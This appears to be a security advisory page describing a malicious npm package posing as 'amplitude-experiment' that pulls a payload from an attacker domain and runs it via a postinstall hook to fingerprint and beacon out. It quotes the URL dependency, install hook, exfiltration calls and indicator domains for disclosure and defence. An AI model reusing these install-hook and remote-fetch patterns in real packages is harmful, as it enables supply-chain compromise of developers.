VDB

GCVE-110-OSM-2026-5909

GCVE-110-OSM-2026-5909
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 14, 2026
This is a supply-chain attack masquerading as the legitimate `amplitude-experiment` package. The outer package's `package.json` specifies an HTTP URL dependency pointing to `https://repo.securityctrl.com/amplitude-experiment` — an attacker-controlled domain — bypassing the npm registry entirely and pulling down an unvetted payload. That fetched payload (`[amplitude-experiment] index.js`) runs at install via a `postinstall: node index.js` hook, collects system information (`os.hostname()`), queries an external IP lookup service (`ipify.org`) for victim fingerprinting, and makes outbound HTTPS requests — consistent with an initial-access beacon to the attacker. The decoded IOC `d8jegmee851s47i10mi09cbof5yzky8qa.caller.securityctrl.com` is characteristic of OAST/DNS-callback infrastructure used to confirm successful installations and exfiltrate identifying data. The publisher `sine8z` has already had 6 packages flagged as critical malware (axis-datagrid, framework-zero, integration-amplitude, katal-logger, librastandardlib, npm-extension), establishing this as a prolific threat actor running a coordinated dependency-confusion/typosquatting campaign. ENTRY index.js (main: index.js) - URL-Based Dependency in package.json: ""dependencies": { "amplitude-experiment": "https://repo.securityctrl.com/amplitu..." - Install Hook Executes Local JS File in [amplitude-experiment] package.json: ""postinstall": "node index.js"" DESTINATION - urls: https://repo.securityctrl.com/amplitude-experiment (loader, plaintext) - domains: repo.securityctrl.com (loader, plaintext) EXFIL - Network Request in [amplitude-experiment] index.js: "https.request(" - System Information Collection in [amplitude-experiment] index.js: "os.hostname()" OBFUSCATION - recovered 1 domains from decoded/deobfuscated content ADDITIONAL FINDINGS - Publisher Has Other Malicious Packages - Publisher Shows Burner-Account Pattern - Shell Command Execution in [amplitude-experiment] index.js: "require('child_process')" PAYLOAD FILES [amplitude-experiment] index.js INDICATORS (IOCs) - domains: d8jegmee851s47i10mi09cbof5yzky8qa.caller.securityctrl.com

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownamplitude-experimentall (affected)

Browse GCVE Records

73,053 records in the GCVE database · Updated July 16, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›